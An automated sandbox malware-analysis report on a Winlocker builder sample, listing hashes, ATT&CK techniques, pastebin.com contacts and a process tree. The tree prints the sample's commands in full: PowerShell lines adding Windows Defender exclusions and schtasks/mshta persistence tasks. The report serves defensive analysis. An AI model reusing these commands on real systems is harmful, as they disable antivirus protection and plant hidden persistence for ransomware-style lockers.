fa7bd4b4c4f621aa00c0007f4af4363904f6e4a2b5ca545e4b38e2de23cb473f

Analysis

max time kernel
148s
max time network
149s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
24-01-2025 23:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

WinlockerBuilderv0.6.exe
Size

1.3MB
MD5

a00721b4615c9ab1c166f08baf5233e3
SHA1

96ab6fee83413faaf6c3e77b52f2684dee0cb76d
SHA256

fa7bd4b4c4f621aa00c0007f4af4363904f6e4a2b5ca545e4b38e2de23cb473f
SHA512

eedf0da3b1f08c5ca46402e6600ea20c2f35310080bdd8c86413e5db5f17f81dca69c79378859a46647b5cbd3684a1d2332733bd03705721d0d0d0056caaf001
SSDEEP

24576:FMbXvsRLDInc+3WNyc4aKZQ6VvDrVq3EXcWdFVtV6d/PH:70c+Gr1YBrNXcEFVf6pPH

Score

10^/10

defense_evasion discovery execution

Malware Config

Signatures

Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1660	powershell.exe
2112	powershell.exe
320	powershell.exe
2580	powershell.exe
2260	powershell.exe

Executes dropped EXE 2 IoCs

pid	Process
2720	Winlocker Builder v0.6.exe
2452	builder.exe

Loads dropped DLL 7 IoCs

pid	Process
2764	rundll32.exe
2764	rundll32.exe
2764	rundll32.exe
2332	cmd.exe
1232	Process not Found
1232	Process not Found
1232	Process not Found

Legitimate hosting services abused for malware hosting/C2 1 TTPs 43 IoCs

Web Service

T1102

flow	ioc
28	pastebin.com
7	pastebin.com
12	pastebin.com
13	pastebin.com
16	pastebin.com
17	pastebin.com
18	pastebin.com
25	pastebin.com
31	pastebin.com
34	pastebin.com
8	pastebin.com
15	pastebin.com
26	pastebin.com
29	pastebin.com
32	pastebin.com
43	pastebin.com
45	pastebin.com
10	pastebin.com
22	pastebin.com
23	pastebin.com
44	pastebin.com
49	pastebin.com
9	pastebin.com
21	pastebin.com
39	pastebin.com
48	pastebin.com
36	pastebin.com
41	pastebin.com
24	pastebin.com
35	pastebin.com
42	pastebin.com
46	pastebin.com
11	pastebin.com
19	pastebin.com
30	pastebin.com
37	pastebin.com
38	pastebin.com
14	pastebin.com
20	pastebin.com
27	pastebin.com
33	pastebin.com
40	pastebin.com
47	pastebin.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
4	ip-api.com

Drops file in System32 directory 8 IoCs

description	ioc	Process
File created	C:\Windows\System32\WinLocker.lnk	rundll32.exe
File opened for modification	C:\Windows\System32\WinLocker.lnk	rundll32.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\System32\WinLocker.cpl	rundll32.exe
File opened for modification	C:\Windows\System32\WinLocker.cpl	rundll32.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	builder.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DllHost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Winlocker Builder v0.6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2880	schtasks.exe
2456	schtasks.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2764	rundll32.exe
2112	powershell.exe
320	powershell.exe
2580	powershell.exe
2260	powershell.exe
1660	powershell.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeDebugPrivilege	1992	WinlockerBuilderv0.6.exe
Token: SeDebugPrivilege	2764	rundll32.exe
Token: SeDebugPrivilege	2112	powershell.exe
Token: SeDebugPrivilege	320	powershell.exe
Token: SeDebugPrivilege	2580	powershell.exe
Token: SeDebugPrivilege	2260	powershell.exe
Token: SeDebugPrivilege	1660	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2452	builder.exe

Suspicious use of WriteProcessMemory 39 IoCs

description	pid	Process	procid_target
PID 1992 wrote to memory of 2608	1992	WinlockerBuilderv0.6.exe	31
PID 1992 wrote to memory of 2608	1992	WinlockerBuilderv0.6.exe	31
PID 1992 wrote to memory of 2608	1992	WinlockerBuilderv0.6.exe	31
PID 2608 wrote to memory of 2764	2608	control.exe	32
PID 2608 wrote to memory of 2764	2608	control.exe	32
PID 2608 wrote to memory of 2764	2608	control.exe	32
PID 1992 wrote to memory of 2720	1992	WinlockerBuilderv0.6.exe	33
PID 1992 wrote to memory of 2720	1992	WinlockerBuilderv0.6.exe	33
PID 1992 wrote to memory of 2720	1992	WinlockerBuilderv0.6.exe	33
PID 1992 wrote to memory of 2720	1992	WinlockerBuilderv0.6.exe	33
PID 2720 wrote to memory of 2332	2720	Winlocker Builder v0.6.exe	34
PID 2720 wrote to memory of 2332	2720	Winlocker Builder v0.6.exe	34
PID 2720 wrote to memory of 2332	2720	Winlocker Builder v0.6.exe	34
PID 2720 wrote to memory of 2332	2720	Winlocker Builder v0.6.exe	34
PID 2332 wrote to memory of 2452	2332	cmd.exe	36
PID 2332 wrote to memory of 2452	2332	cmd.exe	36
PID 2332 wrote to memory of 2452	2332	cmd.exe	36
PID 2332 wrote to memory of 2452	2332	cmd.exe	36
PID 2764 wrote to memory of 2112	2764	rundll32.exe	37
PID 2764 wrote to memory of 2112	2764	rundll32.exe	37
PID 2764 wrote to memory of 2112	2764	rundll32.exe	37
PID 2764 wrote to memory of 2880	2764	rundll32.exe	39
PID 2764 wrote to memory of 2880	2764	rundll32.exe	39
PID 2764 wrote to memory of 2880	2764	rundll32.exe	39
PID 2764 wrote to memory of 2992	2764	rundll32.exe	41
PID 2764 wrote to memory of 2992	2764	rundll32.exe	41
PID 2764 wrote to memory of 2992	2764	rundll32.exe	41
PID 1052 wrote to memory of 2504	1052	taskeng.exe	44
PID 1052 wrote to memory of 2504	1052	taskeng.exe	44
PID 1052 wrote to memory of 2504	1052	taskeng.exe	44
PID 1052 wrote to memory of 2092	1052	taskeng.exe	56
PID 1052 wrote to memory of 2092	1052	taskeng.exe	56
PID 1052 wrote to memory of 2092	1052	taskeng.exe	56
PID 1052 wrote to memory of 2692	1052	taskeng.exe	59
PID 1052 wrote to memory of 2692	1052	taskeng.exe	59
PID 1052 wrote to memory of 2692	1052	taskeng.exe	59
PID 1052 wrote to memory of 2940	1052	taskeng.exe	60
PID 1052 wrote to memory of 2940	1052	taskeng.exe	60
PID 1052 wrote to memory of 2940	1052	taskeng.exe	60

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\WinlockerBuilderv0.6.exe
"C:\Users\Admin\AppData\Local\Temp\WinlockerBuilderv0.6.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1992
- C:\Windows\System32\control.exe
  "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2608
- - C:\Windows\system32\rundll32.exe
    "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    - Loads dropped DLL
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2764
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2112
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2880
  - - C:\Windows\system32\SCHTASKS.exe
      SCHTASKS.exe /RUN /TN "WinLocker"
      4⤵
      PID:2992
- C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
  "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2720
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\8EF7.tmp\Builder #6.bat" "
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2332
  - - C:\Users\Admin\AppData\Local\Temp\8EF7.tmp\builder.exe
      builder.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:2452

C:\Windows\system32\taskeng.exe
taskeng.exe {DF015164-0DCA-4B99-AC0F-EC52BA961D3E} S-1-5-21-3533259084-2542256011-65585152-1000:XPAJOTIY\Admin:Interactive:[1]
1⤵
- Suspicious use of WriteProcessMemory
PID:1052
- C:\Windows\system32\mshta.exe
  mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
  2⤵
  - Modifies Internet Explorer settings
  PID:2504
- C:\Users\Public\explorer.exe
  C:\Users\Public\explorer.exe
  2⤵
  PID:2092
- C:\Users\Public\explorer.exe
  C:\Users\Public\explorer.exe
  2⤵
  PID:2692
- C:\Users\Public\explorer.exe
  C:\Users\Public\explorer.exe
  2⤵
  PID:2940

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
1⤵
- System Location Discovery: System Language Discovery
PID:1916

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Explorer.EXE'
1⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:320

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Explorer.EXE'
1⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2580

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\explorer.exe'
1⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2260

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'
1⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1660

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\Users\Public\explorer.exe"
1⤵
- Scheduled Task/Job: Scheduled Task
PID:2456

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\8EF7.tmp\Builder #6.bat

Filesize
28B

MD5
8051f1a637f4635ede0c96f81302993b

SHA1
1712fdb1a9d64edae50acc063574c1109d613546

SHA256
ff61e26e4d145be670bc4512afdf87210da097acaa43bf97cf278def640b3110

SHA512
b54aec0ff9ec591e2c8507ef4729c3b69e0263337eb52c58dd69f5b2e0b50d5d8f3bc17c32b5c55a2327809f0cd17713f511f3ab7a03bfa826e53da0d8a96c9d

Download Submit
C:\Users\Admin\AppData\Local\Temp\8EF7.tmp\builder.exe

Filesize
2.4MB

MD5
9729d33f5cc788e9c1930bcc968acffa

SHA1
68c662875f7b805dd6f246919d406c8d92158073

SHA256
3711a334cb3c6e2a92461067f2d7db2946e9b139f1517b214bc929ba42a86aae

SHA512
af12beee6da79e5498eb292eb4a122667bf5dcdf840def97a5476adb31e0701a2aa0585b4266547bb4307c3524c7f9733dbf32f2a87c87b33fadb4bb1ecd0c3f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe

Filesize
1.3MB

MD5
4caed3373183b76693cebb8f917faa1f

SHA1
10d2a0c799b6231bc90d66fe59a8245e74bbbaf0

SHA256
a4b302ddaecc5ca50b48152644e3a101d389ed6b72abeb3c610f5f1facaf4547

SHA512
83670f489cb7e4be492e3361ba2291dc725ce5ce7694c5f6e9c988b680dca4147042b2ae8c0d2e78bbda5fa2d6b8c7ca83c8299bd4f1594107262ca26d276128

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
a0a1612e25b513b7a0cab69daeeeab62

SHA1
119618996fda868dc071e895f7c7c3a7c500231f

SHA256
72b737a7d7b6688fc826857b08186202f5b00c57e8072db5155fe723d47a9edc

SHA512
42a4387c3c3a902d185c43298be725ca0349f87c813bdad4771ca23f463ce0dff00266cb3c5fb949adec4d3fb715a5a1be326603875cabbb902b9c4aa1105f69

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CLBRML2I9UOCWUSZ5868.temp

Filesize
7KB

MD5
53bb9f39e545249cb5db2aeb7be26cbf

SHA1
afb3165e3cb5097984ad83cbfc2b88d4faee9f24

SHA256
f7d371c8b3e722935ea57be007af0c6d3563fafb73039d7c0e32b46004454d49

SHA512
b5db9ea079a2ca02c85bcd6413d820140489d699111b1d0122d507f23006b19a8a30d540881dced8847cbf0bbd91d3c654c8964e49728b03e71f50d581b9e5cb

Download Submit
C:\Windows\System32\WinLocker.lnk

Filesize
144B

MD5
c558b32752f713dfd844f5e802d9bb2f

SHA1
1b8ec6eeccfb34e57811f50e3f214e95486f5d2f

SHA256
6fdb6e248a2f917f4a4559f03bdc75548187b6cf53783b92e6e6b3149f494bfd

SHA512
d4fe663ad10eadabd66d921cf1a59d25736a02aa7502a74f99efdee6d473fc3045748549e7aa7622854965b3680f4038bc291b27440dd33c3fb10a8eb2163835

Download Submit
\Users\Admin\AppData\Local\Temp\WinLocker.cpl

Filesize
49KB

MD5
8fe4b2ca0b85980b73050ab7e8eb58a8

SHA1
d78af51db795dd51ffe48f96321d7a3fdd853117

SHA256
16160a0f94f668219b4b69aa3c396aef00388c305e66a887f7a891fb460bc914

SHA512
6d73f190d657b9f04887d7d88ef8aa913e61b3eb8de50de4607f035a32fde9f9bb2f76a9918d73039ca294a56d98e2a7de7f233ff5b43079a5d80bbf7b2392f1

Download Submit
memory/320-61-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

Filesize
2.9MB

Download
memory/320-62-0x0000000002AE0000-0x0000000002AE8000-memory.dmp

Filesize
32KB

Download
memory/1992-2-0x000007FEF57F0000-0x000007FEF61DC000-memory.dmp

Filesize
9.9MB

Download
memory/1992-1-0x0000000000EC0000-0x000000000101A000-memory.dmp

Filesize
1.4MB

Download
memory/1992-18-0x000007FEF57F0000-0x000007FEF61DC000-memory.dmp

Filesize
9.9MB

Download
memory/1992-0-0x000007FEF57F3000-0x000007FEF57F4000-memory.dmp

Filesize
4KB

Download
memory/2112-46-0x000000001B5F0000-0x000000001B8D2000-memory.dmp

Filesize
2.9MB

Download
memory/2112-47-0x0000000002290000-0x0000000002298000-memory.dmp

Filesize
32KB

Download
memory/2452-82-0x0000000000400000-0x0000000000671000-memory.dmp

Filesize
2.4MB

Download
memory/2580-69-0x000000001B700000-0x000000001B9E2000-memory.dmp

Filesize
2.9MB

Download
memory/2580-70-0x0000000002780000-0x0000000002788000-memory.dmp

Filesize
32KB

Download
memory/2720-41-0x0000000000400000-0x000000000067E000-memory.dmp

Filesize
2.5MB

Download
memory/2720-19-0x0000000000400000-0x000000000067E000-memory.dmp

Filesize
2.5MB

Download
memory/2764-17-0x0000000074E10000-0x0000000074E24000-memory.dmp

Filesize
80KB

Download
memory/2764-16-0x0000000001F80000-0x0000000001F94000-memory.dmp

Filesize
80KB

Download